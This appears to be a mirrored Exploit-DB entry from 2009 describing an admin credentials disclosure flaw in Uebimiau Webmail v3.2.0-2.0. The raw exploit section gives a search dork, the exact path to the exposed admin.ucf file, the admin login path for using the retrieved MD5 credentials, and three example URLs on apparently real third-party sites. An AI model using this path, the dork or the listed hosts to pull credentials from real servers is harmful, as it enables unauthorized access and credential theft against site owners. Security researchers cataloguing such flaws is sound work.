Uebimiau Webmail v3.2.0-2.0

vendor:

Webmail

by:

Septemb0x

4,3

CVSS

MEDIUM

Arbitrary Admins Database Disclosure Vulnerability

200

CWE

Product Name: Webmail

Affected Version From: 3.2.0-2.0

Affected Version To: 3.2.0-2.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Uebimiau Webmail v3.2.0-2.0

Uebimiau Webmail v3.2.0-2.0 is vulnerable to an arbitrary admins database disclosure vulnerability. An attacker can exploit this vulnerability by sending a GET request to the target URL with the path '/inc/database/system_admin/admin.ucf' to retrieve the username and password in MD5 format. The attacker can then use the credentials to log in to the admin panel at '/admin/login.php'.

Mitigation:

Ensure that the application is not exposing sensitive information such as credentials in plaintext or MD5 format.

Source

Exploit-DB raw data:

##################################################
[+]Script Name : Uebimiau Webmail v3.2.0-2.0
[+]Bug Type : Arbitrary Admins Database Disclosure Vulnerability
[+]D0rk : "Uebimiau Webmail v3.2.0-2.0"
[+]Author : Septemb0x
[+]Greetz : BHDR & BARCOD3 & MUHADRAM  - Thanks : www.gonulerleri.org
[+]Note :  TÃ¼m MÃ¼slÃ¼man CamiasÄ±na HayÄ±rlÄ± Ramazanlar Dilerim...
##################################################
[+]Examples :
 
1.  http://ifcacareer.com/mail/inc/database/system_admin/admin.ucf
2.  http://krunt.org/webmail/inc/database/system_admin/admin.ucf
3.  http://www.hostsalive.com/webmail/inc/database/system_admin/admin.ucf
##################################################
[+]EXPLOIT ; http://[Target]/[path]/inc/database/system_admin/admin.ucf
[+]GET ; username:password(md5)
[+]LOGIN ; http://[Target]/[path]/admin/login.php
##################################################

# milw0rm.com [2009-08-24]